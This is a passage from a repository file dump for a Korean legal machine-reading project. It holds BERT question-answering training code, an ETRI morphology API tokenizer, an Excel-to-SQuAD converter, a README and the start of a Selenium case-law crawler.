file.\")\n\tparser.add_argument(\"--max_answer_length\", default=30, type=int,\n\t\t\t\t\t\thelp=\"The maximum length of an answer that can be generated. This is needed because the start \"\n\t\t\t\t\t\t\t \"and end predictions are not conditioned on one another.\")\n\tparser.add_argument(\"--verbose_logging\", action='store_true',\n\t\t\t\t\t\thelp=\"If true, all of the warnings related to data processing will be printed. 
\"\n\t\t\t\t\t\t\t \"A number of warnings are expected for a normal SQuAD evaluation.\")\n\tparser.add_argument(\"--no_cuda\",\n\t\t\t\t\t\taction='store_true',\n\t\t\t\t\t\thelp=\"Whether not to use CUDA when available\")\n\tparser.add_argument('--seed',\n\t\t\t\t\t\ttype=int,\n\t\t\t\t\t\tdefault=42,\n\t\t\t\t\t\thelp=\"random seed for initialization\")\n\tparser.add_argument('--gradient_accumulation_steps',\n\t\t\t\t\t\ttype=int,\n\t\t\t\t\t\tdefault=1,\n\t\t\t\t\t\thelp=\"Number of updates steps to accumulate before performing a backward/update pass.\")\n\tparser.add_argument(\"--do_lower_case\",\n\t\t\t\t\t\taction='store_true',\n\t\t\t\t\t\thelp=\"Whether to lower case the input text. True for uncased models, False for cased models.\")\n\tparser.add_argument(\"--local_rank\",\n\t\t\t\t\t\ttype=int,\n\t\t\t\t\t\tdefault=-1,\n\t\t\t\t\t\thelp=\"local_rank for distributed training on gpus\")\n\tparser.add_argument('--fp16',\n\t\t\t\t\t\taction='store_true',\n\t\t\t\t\t\thelp=\"Whether to use 16-bit float precision instead of 32-bit\")\n\tparser.add_argument('--loss_scale',\n\t\t\t\t\t\ttype=float, default=0,\n\t\t\t\t\t\thelp=\"Loss scaling to improve fp16 numeric stability. Only used when fp16 set to True.\\n\"\n\t\t\t\t\t\t\t \"0 (default value): dynamic loss scaling.\\n\"\n\t\t\t\t\t\t\t \"Positive power of 2: static loss scaling value.\\n\")\n\tparser.add_argument('--gpu_id',\n\t\t\t\t\t\ttype=str, default=\"6\",\n\t\t\t\t\t\thelp=\"GPU ID\")\n\n\treturn parser\n\t\ndef main():\n\n\tparser = argparse.ArgumentParser()\n\tparser = parser_add_argument( parser )\n\targs = parser.parse_args()\n\n\tos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\n\tos.environ[\"CUDA_VISIBLE_DEVICES\"] = args.gpu_id\n\n\tif args.local_rank == -1 or args.no_cuda:\n\t\tdevice = torch.device(\"cuda\" if torch.cuda.is_available() and not args.no_cuda else \"cpu\")\n\t\tn_gpu = torch.cuda.device_count()\n\telse:\n\t\ttorch.cuda.set_device(args.local_rank)\n\t\tdevice = torch.device(\"cuda\", args.local_rank)\n\t\tn_gpu = 1\n\t\t# Initializes the distributed backend which will take care of sychronizing nodes/GPUs\n\t\ttorch.distributed.init_process_group(backend='nccl')\n\tlogger.info(\"device: {} n_gpu: {}, distributed training: {}, 16-bits training: {}\".format(\n\t\tdevice, n_gpu, bool(args.local_rank != -1), args.fp16))\n\n\tif args.gradient_accumulation_steps < 1:\n\t\traise ValueError(\"Invalid gradient_accumulation_steps parameter: {}, should be >= 1\".format(\n\t\t\t\t\t\t\targs.gradient_accumulation_steps))\n\n\n\targs.train_batch_size = int(args.train_batch_size / args.gradient_accumulation_steps)\n\n\tprint(\"SEED : \", args.seed)\n\trandom.seed(args.seed)\n\tnp.random.seed(args.seed)\n\ttorch.manual_seed(args.seed)\n\tif n_gpu > 0:\n\t\ttorch.cuda.manual_seed_all(args.seed)\n\n\tif not args.do_train and not args.do_predict :\n\t\traise ValueError(\"At least one of `do_train` or `do_predict` must be True.\")\n\n\tif args.do_train:\n\t\tif not args.train_file:\n\t\t\traise ValueError(\n\t\t\t\t\"If `do_train` is True, then `train_file` must be specified.\")\n\tif args.do_predict:\n\t\tif not args.predict_file:\n\t\t\traise ValueError(\n\t\t\t\t\"If `do_predict` is True, then `predict_file` must be specified.\")\n\t# junho @ check if tokenized file exists\n\tif not os.path.isfile(args.tokenized_file) :\n\t\traise ValueError(\n\t\t\t\"`tokenized file` must exist\")\n\n\tif args.do_train :\n\t\tif os.path.exists(args.output_dir) and os.listdir(args.output_dir) :\n\t\t\tlogger.error(\"Output directory 
() already exists and is not empty.\")\n\t\tos.makedirs(args.output_dir, exist_ok=True)\n\n\ttokenizer_path = args.bert_model\n\tif args.vocab_file != None :\n\t\ttokenizer_path = os.path.join(args.bert_model, args.vocab_file)\n\n\ttokenizer = BertTokenizer.from_pretrained(str(tokenizer_path), do_lower_case=False)\n\n\t# junho @ load tokenized file.\n\twith open(args.tokenized_file, \"r\", encoding='utf-8') as reader:\n\t\tTokenizingDict = json.load(reader)\n\n\ttrain_examples = None\n\tnum_train_steps = None\n\tif args.do_train:\n\t\t#########################################\n\t\t### joonho.lim @ 2019-03-15\n\t\ttrain_examples = read_squad_examples_and_do_lang( input_file=args.train_file, is_training=True, Tokenizing = TokenizingDict )\n\t\tnum_train_steps = int(len(train_examples) / args.train_batch_size / args.gradient_accumulation_steps * args.num_train_epochs)\n\n\t\t# joonho.lim - for small-size sample training\n\t\tif num_train_steps == 0 :\n\t\t\tnum_train_steps = 1\n\n\t# Prepare model\n\tstate_dict = None\n\tif args.bert_model_file != None :\n\t\tstate_dict = torch.load( os.path.join(args.bert_model, args.bert_model_file) )\n\tmodel = BertForQuestionAnswering.from_pretrained(args.bert_model, state_dict=state_dict,\n\t\t\t\tcache_dir=PYTORCH_PRETRAINED_BERT_CACHE / 'distributed_{}'.format(args.local_rank))\n\n\tif args.fp16:\n\t\tmodel.half()\n\tmodel.to(device)\n\tif args.local_rank != -1:\n\t\ttry:\n\t\t\tfrom apex.parallel import DistributedDataParallel as DDP\n\t\texcept ImportError:\n\t\t\traise ImportError(\"Please install apex from https://www.github.com/nvidia/apex to use distributed and fp16 training.\")\n\n\t\tmodel = DDP(model)\n\telif n_gpu > 1:\n\t\tmodel = torch.nn.DataParallel(model)\n\n\t# Prepare optimizer\n\tparam_optimizer = list(model.named_parameters())\n\n\t# hack to remove pooler, which is not used\n\t# thus it produce None grad that break apex\n\tparam_optimizer = [n for n in param_optimizer if 'pooler' not in n[0]]\n\n\tno_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']\n\toptimizer_grouped_parameters = [\n\t\t{'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay': 0.01},\n\t\t{'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}\n\t\t]\n\n\tt_total = num_train_steps\n\tif args.local_rank != -1:\n\t\tt_total = t_total // torch.distributed.get_world_size()\n\tif args.fp16:\n\t\ttry:\n\t\t\tfrom apex.optimizers import FP16_Optimizer\n\t\t\tfrom apex.optimizers import FusedAdam\n\t\texcept ImportError:\n\t\t\traise ImportError(\"Please install apex from https://www.github.com/nvidia/apex to use distributed and fp16 training.\")\n\n\t\toptimizer = FusedAdam(optimizer_grouped_parameters,\n\t\t\t\t\t\t\t lr=args.learning_rate,\n\t\t\t\t\t\t\t bias_correction=False,\n\t\t\t\t\t\t\t max_grad_norm=1.0)\n\t\tif args.loss_scale == 0:\n\t\t\toptimizer = FP16_Optimizer(optimizer, dynamic_loss_scale=True)\n\t\telse:\n\t\t\toptimizer = FP16_Optimizer(optimizer, static_loss_scale=args.loss_scale)\n\telse:\n\t\toptimizer = BertAdam(optimizer_grouped_parameters,\n\t\t\t\t\t\t\t lr=args.learning_rate,\n\t\t\t\t\t\t\t warmup=args.warmup_proportion,\n\t\t\t\t\t\t\t t_total=t_total)\n\n\tglobal_step = 0\n\tif args.do_train:\n\t\tcached_train_features_file = args.train_file+'_{0}_{1}_{2}_{3}'.format(\n\t\t\tlist(filter(None, args.bert_model.split('/'))).pop(), str(args.max_seq_length), str(args.doc_stride), str(args.max_query_length))\n\t\ttrain_features = None\n\t\ttry:\n\t\t\twith 
open(cached_train_features_file, \"rb\") as reader:\n\t\t\t\ttrain_features = pickle.load(reader)\n\t\texcept:\n\t\t\ttrain_features = convert_examples_to_features(\n\t\t\t\texamples=train_examples,\n\t\t\t\ttokenizer=tokenizer,\n\t\t\t\tmax_seq_length=args.max_seq_length,\n\t\t\t\tdoc_stride=args.doc_stride,\n\t\t\t\tmax_query_length=args.max_query_length,\n\t\t\t\tis_training=True)\n\t\t\tif args.local_rank == -1 or torch.distributed.get_rank() == 0:\n\t\t\t\tlogger.info(\" Saving train features into cached file %s\", cached_train_features_file)\n\t\t\t\twith open(cached_train_features_file, \"wb\") as writer:\n\t\t\t\t\tpickle.dump(train_features, writer)\n\t\tlogger.info(\"***** Training *****\")\n\t\tlogger.info(\" Num orig examples = %d\", len(train_examples))\n\t\tlogger.info(\" Num split examples = %d\", len(train_features))\n\t\tlogger.info(\" Batch size = %d\", args.train_batch_size)\n\t\tlogger.info(\" Num steps = %d\", num_train_steps)\n\t\tall_input_ids = torch.tensor([f.input_ids for f in train_features], dtype=torch.long)\n\t\tall_input_mask = torch.tensor([f.input_mask for f in train_features], dtype=torch.long)\n\t\tall_segment_ids = torch.tensor([f.segment_ids for f in train_features], dtype=torch.long)\n\t\tall_start_positions = torch.tensor([f.start_position for f in train_features], dtype=torch.long)\n\t\tall_end_positions = torch.tensor([f.end_position for f in train_features], dtype=torch.long)\n\t\ttrain_data = TensorDataset(all_input_ids, all_input_mask, all_segment_ids,\n\t\t\t\t\t\t\t\t all_start_positions, all_end_positions)\n\t\tif args.local_rank == -1:\n\t\t\ttrain_sampler = RandomSampler(train_data)\n\t\telse:\n\t\t\ttrain_sampler = DistributedSampler(train_data)\n\t\ttrain_dataloader = DataLoader(train_data, sampler=train_sampler, batch_size=args.train_batch_size)\n\n\tmodel.train()\n\tfor epoch_i in trange(int(args.num_train_epochs), desc=\"Epoch\"):\n\t\tfor step, batch in enumerate(tqdm(train_dataloader, desc=\"Iteration\")):\n\t\t\tif n_gpu == 1:\n\t\t\t\tbatch = tuple(t.to(device) for t in batch) # multi-gpu does scattering it-self\n\t\t\tinput_ids, input_mask, segment_ids, start_positions, end_positions = batch\n\t\t\tloss = model(input_ids, segment_ids, input_mask, start_positions, end_positions)\n\t\t\tif n_gpu > 1:\n\t\t\t\tloss = loss.mean() # mean() to average on multi-gpu.\n\t\t\tif args.gradient_accumulation_steps > 1:\n\t\t\t\tloss = loss / args.gradient_accumulation_steps\n\n\t\t\tif args.fp16:\n\t\t\t\toptimizer.backward(loss)\n\t\t\telse:\n\t\t\t\tloss.backward()\n\t\t\tif (step + 1) % args.gradient_accumulation_steps == 0:\n\t\t\t\t# modify learning rate with special warm up BERT uses\n\t\t\t\tlr_this_step = args.learning_rate * warmup_linear(global_step/t_total, args.warmup_proportion)\n\t\t\t\tfor param_group in optimizer.param_groups:\n\t\t\t\t\tparam_group['lr'] = lr_this_step\n\t\t\t\toptimizer.step()\n\t\t\t\toptimizer.zero_grad()\n\t\t\t\tglobal_step += 1\n\n\t# Save a trained model\n\tmodel_to_save = model.module if hasattr(model, 'module') else model # Only save the model it-self\n\toutput_model_file = os.path.join(args.output_dir, \"pytorch_model.bin\")\n\tif args.do_train:\n\t\ttorch.save(model_to_save.state_dict(), output_model_file)\n\n\t# Load a trained model that you have fine-tuned\n\tmodel_state_dict = torch.load(output_model_file)\n\tmodel = BertForQuestionAnswering.from_pretrained(args.bert_model, state_dict=model_state_dict)\n\tmodel.to(device)\n\t\t\n\tif args.do_predict and (args.local_rank == -1 or 
torch.distributed.get_rank() == 0):\n\t\t#########################################\n\t\t### joonho.lim @ 2019-03-15\n\t\teval_examples = read_squad_examples_and_do_lang( input_file=args.predict_file, is_training=False , Tokenizing = TokenizingDict)\n\t\teval_features = convert_examples_to_features(\n\t\t\texamples=eval_examples,\n\t\t\ttokenizer=tokenizer,\n\t\t\tmax_seq_length=args.max_seq_length,\n\t\t\tdoc_stride=args.doc_stride,\n\t\t\tmax_query_length=args.max_query_length,\n\t\t\tis_training=False)\n\n\t\tlogger.info(\"***** Running predictions *****\")\n\t\tlogger.info(\" Num orig examples = %d\", len(eval_examples))\n\t\tlogger.info(\" Num split examples = %d\", len(eval_features))\n\t\tlogger.info(\" Batch size = %d\", args.predict_batch_size)\n\n\t\tall_input_ids = torch.tensor([f.input_ids for f in eval_features], dtype=torch.long)\n\t\tall_input_mask = torch.tensor([f.input_mask for f in eval_features], dtype=torch.long)\n\t\tall_segment_ids = torch.tensor([f.segment_ids for f in eval_features], dtype=torch.long)\n\t\tall_example_index = torch.arange(all_input_ids.size(0), dtype=torch.long)\n\t\teval_data = TensorDataset(all_input_ids, all_input_mask, all_segment_ids, all_example_index)\n\t\t# Run prediction for full data\n\t\teval_sampler = SequentialSampler(eval_data)\n\t\teval_dataloader = DataLoader(eval_data, sampler=eval_sampler, batch_size=args.predict_batch_size)\n\n\t\tmodel.eval()\n\t\tall_results = []\n\t\tlogger.info(\"Start evaluating\")\n\t\tfor input_ids, input_mask, segment_ids, example_indices in tqdm(eval_dataloader, desc=\"Evaluating\"):\n\t\t\tif len(all_results) % 1000 == 0:\n\t\t\t\tlogger.info(\"Processing example: %d\" % (len(all_results)))\n\t\t\tinput_ids = input_ids.to(device)\n\t\t\tinput_mask = input_mask.to(device)\n\t\t\tsegment_ids = segment_ids.to(device)\n\t\t\twith torch.no_grad():\n\t\t\t\tbatch_start_logits, batch_end_logits = model(input_ids, segment_ids, input_mask)\n\t\t\tfor i, example_index in enumerate(example_indices):\n\t\t\t\tstart_logits = batch_start_logits[i].detach().cpu().tolist()\n\t\t\t\tend_logits = batch_end_logits[i].detach().cpu().tolist()\n\t\t\t\teval_feature = eval_features[example_index.item()]\n\t\t\t\tunique_id = int(eval_feature.unique_id)\n\t\t\t\tall_results.append(RawResult(unique_id=unique_id,\n\t\t\t\t\t\t\t\t\t\t\t start_logits=start_logits,\n\t\t\t\t\t\t\t\t\t\t\t end_logits=end_logits))\n\t\toutput_prediction_file = os.path.join(args.output_dir, \"predictions.json\")\n\t\toutput_nbest_file = os.path.join(args.output_dir, \"nbest_predictions.json\")\n\t\tpreds = write_predictions(eval_examples, eval_features, all_results,\n\t\t\t\t\t\t args.n_best_size, args.max_answer_length,\n\t\t\t\t\t\t args.do_lower_case, output_prediction_file,\n\t\t\t\t\t\t output_nbest_file, args.verbose_logging)\n\ndef evaluate() :\n\n\tparser = argparse.ArgumentParser()\n\tparser = parser_add_argument(parser)\n\targs = parser.parse_args()\n\n\toutput_prediction_file = os.path.join(args.output_dir, \"predictions.json\")\n\toutput_true_file = args.predict_file\n\n\n\toutput_null_log_odds_file = None\n\n\tevaluate_options = EVAL_OPTS(data_file=args.predict_file,\n\t\t\t\t\t\t\t\t pred_file=output_prediction_file,\n\t\t\t\t\t\t\t\t na_prob_file=output_null_log_odds_file)\n\tresults = evaluate_on_squad(evaluate_options)\n\n\n\twith open(os.path.join(args.output_dir, \"result.txt\"), \"w\") as fp :\n\t\tfp.write(json.dumps(results))\n\n\nif __name__ == \"__main__\":\n\tmain()\n\tevaluate()\n"
},
{
"alpha_fraction": 0.6417666077613831,
"alphanum_fraction": 0.6483097076416016,
"avg_line_length": 31.192981719970703,
"blob_id": "ea06fefa76a776f98f391ce802e9ea970791bc00",
"content_id": "4679933722d896040340e4e33780f22d01e94eb1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1914,
"license_type": "no_license",
"max_line_length": 136,
"num_lines": 57,
"path": "/EtriBERT/runningcode/tokenizing.py",
"repo_name": "junho-one/AILaw",
"src_encoding": "UTF-8",
"text": "import argparse\nimport json\nimport urllib3\nfrom tqdm import tqdm\n\ndef parser_add_argument\t( parser ) :\n\n ## Required parameters\n parser.add_argument(\"--openapi_key\", default=\"key\", type=str, required=True, help=\"OpenAPI key information for morphology analysis\")\n ## Other parameters\n parser.add_argument(\"--input_file\", default=\"../../data/law.json\", type=str, help=\"all file that include train file and test file\")\n parser.add_argument('--output_file', type=str, default=\"../../data/tokenizing.json\", help=\"Tokenizing file\")\n\n return parser\n\ndef do_lang(openapi_key, text):\n openApiURL = \"http://aiopen.etri.re.kr:8000/WiseNLU\"\n\n requestJson = {\"access_key\": openapi_key, \"argument\": {\"text\": text, \"analysis_code\": \"morp\"}}\n\n http = urllib3.PoolManager()\n response = http.request(\"POST\", openApiURL, headers={\"Content-Type\": \"application/json; charset=UTF-8\"},\n body=json.dumps(requestJson))\n\n return response.data.decode()\n\n\ndef main() :\n parser = argparse.ArgumentParser()\n parser = parser_add_argument(parser)\n args = parser.parse_args()\n\n APIkey = args.openapi_key\n # predefined question list\n questionList = [\"피해자가 누구인가요?\", \"범행이 언제 발생했나요?\", \"범행이 어디서 발생했나요?\", \"어떤 범행이 발생했나요?\"]\n\n with open(args.input_file) as json_file:\n json_data = json.load(json_file)\n\n num = 0\n Tokenized = {}\n\n for ques in questionList :\n Tokenized[ques] = do_lang(APIkey, ques)\n\n for paragraphs_title in tqdm(json_data['data']) :\n num += 1\n Tokenized[paragraphs_title['paragraphs'][0]['context']] = [do_lang(APIkey, paragraphs_title['paragraphs'][0]['context'])]\n\n with open(args.output_file, \"w\") as writer:\n writer.write(json.dumps(Tokenized, indent=4, ensure_ascii=False) + \"\\n\")\n\n\n\n\nif __name__ == \"__main__\":\n\tmain()"
},
{
"alpha_fraction": 0.5614818930625916,
"alphanum_fraction": 0.5664739608764648,
"avg_line_length": 24.046052932739258,
"blob_id": "49b9b8f109d39ed2ce1b813ae1323e192b3d5904",
"content_id": "280036354dfc46b101ae0f374b63d771c1843698",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3818,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 152,
"path": "/data-processing/preprocess.py",
"repo_name": "junho-one/AILaw",
"src_encoding": "UTF-8",
"text": "# convert excel to json\n\nimport xlrd\nimport json\nimport copy\nimport random\nimport argparse\nimport os\n\ndef load_data(fn) :\n wb=xlrd.open_workbook(fn)\n ws=wb.sheet_by_index(0)\n\n nrow = ws.nrows\n ncol = ws.ncols\n print(\"> Read excel file\")\n print(\"row num :\",nrow)\n print(\"col num :\",ncol)\n\n return ws\n\ndef convertExcelToJson (excel, to_all) :\n questionList = [excel.cell_value(0, i) for i in range(excel.ncols)]\n qNum = {}\n\n for i in range(len(questionList)):\n if \"?\" in questionList[i]:\n qNum[i] = 0\n\n article = []\n answer = []\n\n dataList = []\n datatmp = {}\n\n paragraphList = []\n paragraphtmp = {}\n\n qasList = []\n qastmp = {}\n\n ansList = []\n anstmp = {}\n\n id = 0\n for row in range(2, excel.nrows):\n article.append(len(excel.cell_value(row, 2)))\n\n for col in range(3, excel.ncols, 2):\n if len(excel.cell_value(row, col)) > 0:\n qNum[col] += 1\n\n text = excel.cell_value(row, col)\n startNum = excel.cell_value(row, col + 1)\n\n anstmp['answer_start'] = startNum\n anstmp['text'] = text\n ansList.append(anstmp)\n anstmp = {}\n\n answer.append(len(text))\n\n qastmp['question'] = questionList[col]\n qastmp['answers'] = ansList\n qastmp['id'] = str(id)\n\n qasList.append(qastmp)\n\n ansList = []\n qastmp = {}\n id = id + 1\n\n paragraphtmp['context'] = excel.cell_value(row, 2).strip()\n paragraphtmp['qas'] = qasList\n\n paragraphList.append(paragraphtmp)\n qasList = []\n paragraphtmp = {}\n\n datatmp['title'] = excel.cell_value(row, 0).strip()\n datatmp['paragraphs'] = paragraphList\n dataList.append(copy.deepcopy(datatmp))\n\n paragraphList = []\n\n print(\"\\n총 데이터(context) 개수 :\", len(dataList))\n\n random.shuffle(dataList)\n\n lawdict = {}\n lawdict['data'] = dataList\n\n for idx, count in qNum.items() :\n print(questionList[idx] + \" : \" + str(count))\n\n with open(to_all, \"w\", encoding=\"utf-8\") as make_file:\n json.dump(lawdict, make_file, ensure_ascii=False, indent=\"\\t\")\n\n return lawdict\n\ndef train_test_split(lawdict, to_trn, to_tst) :\n\n length = len(lawdict['data'])\n train_length = int(length * 0.7)\n\n train = {}\n trainList = []\n\n test = {}\n testList = []\n\n for i in range(train_length):\n trainList.append(lawdict['data'][i])\n\n for i in range(train_length, length):\n testList.append(lawdict['data'][i])\n\n print(\"\\n> Train-Test-Split\")\n print(\" Train :\", len(trainList), \"Test :\", len(testList))\n\n train['data'] = trainList\n test['data'] = testList\n\n with open(to_trn, \"w\", encoding=\"utf-8\") as make_file:\n json.dump(train, make_file, ensure_ascii=False, indent=\"\\t\")\n\n with open(to_tst, \"w\", encoding=\"utf-8\") as make_file:\n json.dump(test, make_file, ensure_ascii=False, indent=\"\\t\")\n\n\ndef parser_add_argument\t( parser ) :\n parser.add_argument(\"--input_file\", default=\"../data/law.xlsx\", type=str, help=\"KorCL excel file\")\n parser.add_argument(\"--output_dir\", default=\"../data/\", type=str, help=\"KorCL json file\")\n\n return parser\n\ndef main() :\n\n parser = argparse.ArgumentParser()\n parser = parser_add_argument(parser)\n args = parser.parse_args()\n\n train_fn = os.path.join( args.output_dir, \"train.json\" )\n test_fn = os.path.join( args.output_dir, \"test.json\")\n all_fn = os.path.join( args.output_dir, \"law.json\" )\n\n law_excel = load_data(args.input_file)\n law_dict = convertExcelToJson(law_excel, all_fn)\n train_test_split(law_dict, train_fn, test_fn)\n\nif __name__ == \"__main__\" :\n main()"
},
{
"alpha_fraction": 0.6736252307891846,
"alphanum_fraction": 0.699592649936676,
"avg_line_length": 25.01324462890625,
"blob_id": "b45ba8ede4be31f57ef2fcfb05e9b5105e91aca0",
"content_id": "f6a554632db57566a863514bf3ffb01267ac64cf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 5862,
"license_type": "no_license",
"max_line_length": 220,
"num_lines": 151,
"path": "/README.md",
"repo_name": "junho-one/AILaw",
"src_encoding": "UTF-8",
"text": "# AI law ([Paper](https://www.cseric.or.kr/literature/ser_view.php?))\n\n판례 내에 있는 핵심 정보를 추출하는 인공지능 모델을 BERT를 이용하여 구현했고, 학습에 필요한 데이터셋을 정의하였다.<br/>\n본 프로젝트에서 정의한 핵심 정보란 아래와 같다\n* \"누가 범죄를 저질렀는지\"\n* \"언제 범죄를 저질렀는지\"\n* \"어디서 범죄를 저질렀는지\"\n* \"어떤 범죄를 저질렀는지\"\n\n정보를 추출하기 위해 기계독해 방식으로 문제에 접근하였고, 학습 데이터셋을 SQuAD 형식에 맞춰 태깅하였다.<br/>\n판례 내에 있는 \"범죄 사실\"이라는 사건의 경위를 담고 있는 단락을 **context**로 하고,\n추출하고자 하는 핵심 정보를 **question과 answer**을 통해 태깅했다.\n\n\nEtri의 KorBERT와 구글의 Multilingual BERT를 사용하여 성능을 비교해봤고,<br/>\n결과적으로 형태소 분석을 수행한 뒤 KorBERT를 통해 학습시키는 방법이 대부분의 상황에서 좋은 성능을 냈다.\n\n\n\n## Dependencies\n* torch>=1.7.0\n* transformers>=4.0.0\n* scikit-learn\n* selenium\n* xlrd\n* xlsxwriter\n\n\n\n## Dataset\n\n\n<p align=\"center\">\n <img src=\"./image/dataEx.PNG\" alt=\"text\" width=\"number\" />\n</p>\n\n----\n\n\nKorCL 데이터 셋을 구축하기 위해 법률정보통합검색 사이트인‘리걸서치’에서 성범죄 관련 판례 677건, 살인 관련 판례 46건, 폭행 관련 판례 278건으로 총 1,001건을 수집하였다. \n1,001건의 판례에 대한 질문으로는 WHO에 대한 질문 1,001개, WHEN에 대한 질문 975개, WHERE에 대한 질문 908개, WHAT에 대한 질문 1,001개로 총 3,885개의 질의응답쌍을 구축하였다\n\n\n## How to Use\n\n### - Crawler\n`python3 crawler/run_crawler.py`를 통해 [리걸서치 사이트](https://legalsearch.kr/)에서 판례 데이터를 크롤링할 수 있다.\n\n현재 코드는 리걸서치에서 수집하고자 하는 키워드를 검색하였을 때, 검색되는 판례들만을 크롤링하도록 되어 있다. **만약, 다른 유형의 판례들도 수집하고 싶다면 main 함수의 `keywords` 리스트에 검색할 키워드를 입력하여 코드를 실행하면 된다.**\n\n<br/>\n\n### - Model\n\n### 1. preprocess data\n\n```\npython3 preprocess.py \n--input_file ../data/law.xlsx\n--output_dir ../data/\n```\n\ndata-processing 폴더 안에 있는 preprocess.py 실행시 excel 파일을 squad 데이터 형식의 데이터셋으로 변환된다.\n\n* train.json : 70% data\n* test.json : 30% data\n* law.json : 100% data\n\n\n### 2. multilingual-BERT\n\n``` \npython3 run_squad.py \n--model_type bert \n--model_name_or_path bert-base-multilingual-uncased \n--do_train \n--do_lower \n--do_eval \n--train_file ../../data/train.json \n--predict_file ../../data/test.json \n--per_gpu_train_batch_size 12 \n--learning_rate 3e-5 \n--num_train_epochs 2.0 \n--max_seq_length 384 \n--doc_stride 128 \n--overwrite_output \n--overwrite_cache \n--output_dir ../../outputDir/multilingual/ \n--save_steps 5000 \n--make_cache_file False\n```\n\nmultilingualBERT/runningcode 폴더 안에 있는 run_squad.py 실행시 입력 인자로 받은 train_file을 이용하여 학습하고, predict_file로 모델 평가를 한다. <br/>\npredict_file에 대한 f1 score와 exact match score를 결과로 출력창에 보여준다.\n\noutput_dir인 결과 폴더 안에는 예측 결과가 들어 있는 predictions.json,<br/>\nfine tuning 을 거친 모델인 pytorch_model.bin 등이 생성된다.\n\n\n### 3. ETRI-BERT\n\nEtri의 KorBERT를 사용하기 위해서는 [이 사이트](http://aiopen.etri.re.kr/service_dataset.php)에서 사용허가협약서를 작성한 뒤 다운로드 받아야 한다.<br/>\npretrained model은 개인이 따로 공개할 수 없어 업로드하지 않겠지만, 모델을 다운받은 후 EtriBERT/ 폴더에 넣어주면 된다.\n\n\n#### 3-1. 형태소 분석용 파일을 생성\n\n```\npython3 tokenizing.py\n--openapi_key your key\n--input_file ../../data/law.json \n--output_file ../../data/tokenizing.json\n```\n\nEtriBERT를 사용하기 위해서는 Etri에서 제공하는 형태소 분석 API를 사용하여 형태소 분석된 문장을 인풋으로 넣어줘야한다.<br/>\n하지만 형태소 분석 API 호출은 하루 당 5000건으로 제한되어 있기에 API를 미리 호출시켜 학습 시 사용될 입력 문장을 형태소 분석된 문장으로 바꾼 뒤 파일인 tokenizing.json에 저장해야한다.\n\n* 모든 데이터가 들어있는 law.json 파일을 불러와서 API호출 후 tokenizing.json 파일을 생성\n\n\n#### 3-2. EtriBERT를 실행\n\n```\npython3 run_squad_ETRI.py \n--openapi_key `your key` \n--bert_model .. 
\n--train_file ../../data/train.json \n--predict_file ../../data/test.json \n--output_dir ../../outputDir/EtriBERT \n--tokenized_file ../../data/tokenizing.json \n--do_train \n--do_predict\n```\n\nEtriBERT 폴더 안에 있는 run_squad_ETRI.py 실행시 train_file을 학습시켜, test_file을 f1 score와 exact match score를 통해 평가한다.<br/>\n결과 폴더 안에 예측 결과가 들어 있는 predictions.json과 점수가 들어있는 result.txt, fine tuning된 모델인 pytorch_model.bin가 생성된다.\n\n> openapi_key는 etri API DATA 서비스 포털에서 발급 가능하다.<br/>\n> 반드시 발급받은 후 key값을 넣어주어야 한다.\n\n## Result\n\n한국어만을 사용해 학습한 뒤 형태소 분석기를 사용한 Etri의 KorBERT가 Multilingual BERT에 비해 전체적으로 높은 성능을 보였다.\n\n\n\n## Award\n\n논문 이름 : [기계독해를 이용한 판례 내 주요 정보 추출 방법](https://www.cseric.or.kr/literature/ser_view.php?searchCate=literature&SnxGubun=INME&mode=total&SnxGubun=INME&gu=INME000F9&cmd=qryview&SnxIndxNum=214256&rownum=1&f1=MN&q1=Junho%20Won)\n\n<img src=\"./award/award.jpg\" width=\"300\" height=\"300\">\n"
},
{
"alpha_fraction": 0.5734567642211914,
"alphanum_fraction": 0.5808641910552979,
"avg_line_length": 31.83783721923828,
"blob_id": "33d2a1521f1dae83ba3b9791b1be0c9b4a111e3a",
"content_id": "69493d5284f7a6950e67900adb22128441345f76",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4948,
"license_type": "no_license",
"max_line_length": 145,
"num_lines": 148,
"path": "/crawler/run_crawler.py",
"repo_name": "junho-one/AILaw",
"src_encoding": "UTF-8",
"text": "import re\nimport json\nfrom threading import Thread\nimport queue\n\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\n\nimport pandas as pd\n\nclass ThreadWithReturnValue(object):\n def __init__(self, target=None, args=(), **kwargs):\n self._que = queue.Queue()\n self._t = Thread(target=lambda q,arg1,kwargs1: q.put(target(*arg1, **kwargs1)) ,\n args=(self._que, args, kwargs), )\n self._t.start()\n\n def join(self):\n self._t.join()\n return self._que.get()\n\ndef crawlCases(driver, wait, prev_data_title_list):\n url_list = driver.find_element_by_xpath('//*[@id=\"search_result\"]/div/article/dl').find_elements_by_tag_name('a')\n\n contents = []\n titles = []\n for url in url_list:\n url.click()\n\n window_before = driver.window_handles[0]\n window_after = driver.window_handles[1]\n\n\n driver.switch_to.window(window_after)\n\n wait.until(EC.presence_of_element_located((By.TAG_NAME, 'iframe')))\n iframes = driver.find_elements_by_tag_name('iframe')\n if len(iframes) != 1:\n print(\"iframe error\")\n exit()\n driver.switch_to.frame(iframes[0])\n\n case = driver.find_element_by_xpath(\"/html/body\")\n case = case.text\n\n title = case.split(\"\\n\")[0]\n title = title.replace(\",\", \"\")\n title = title.replace(\" \", \"\")\n\n if \"선고\" in title:\n title = title.split(\"선고\")[1]\n if \"【\" in title:\n title = title.split(\"【\")[0]\n if \":\" in title:\n title = title.split(\":\")[0]\n\n # title = re.sub('[^【]', '', title)\n # # title = re.sub('[【】]', '', title)\n # # match = re.search(\"[【】]\", title)\n # # title.mat\n\n if title not in prev_data_title_list:\n contents.append(case)\n titles.append(title)\n\n driver.switch_to.window(window_before)\n\n return contents\n\n\ndef crawling(keyword):\n prev_data_title_list = []\n prev_data_fn = \"../korcl_2019/law.json\"\n with 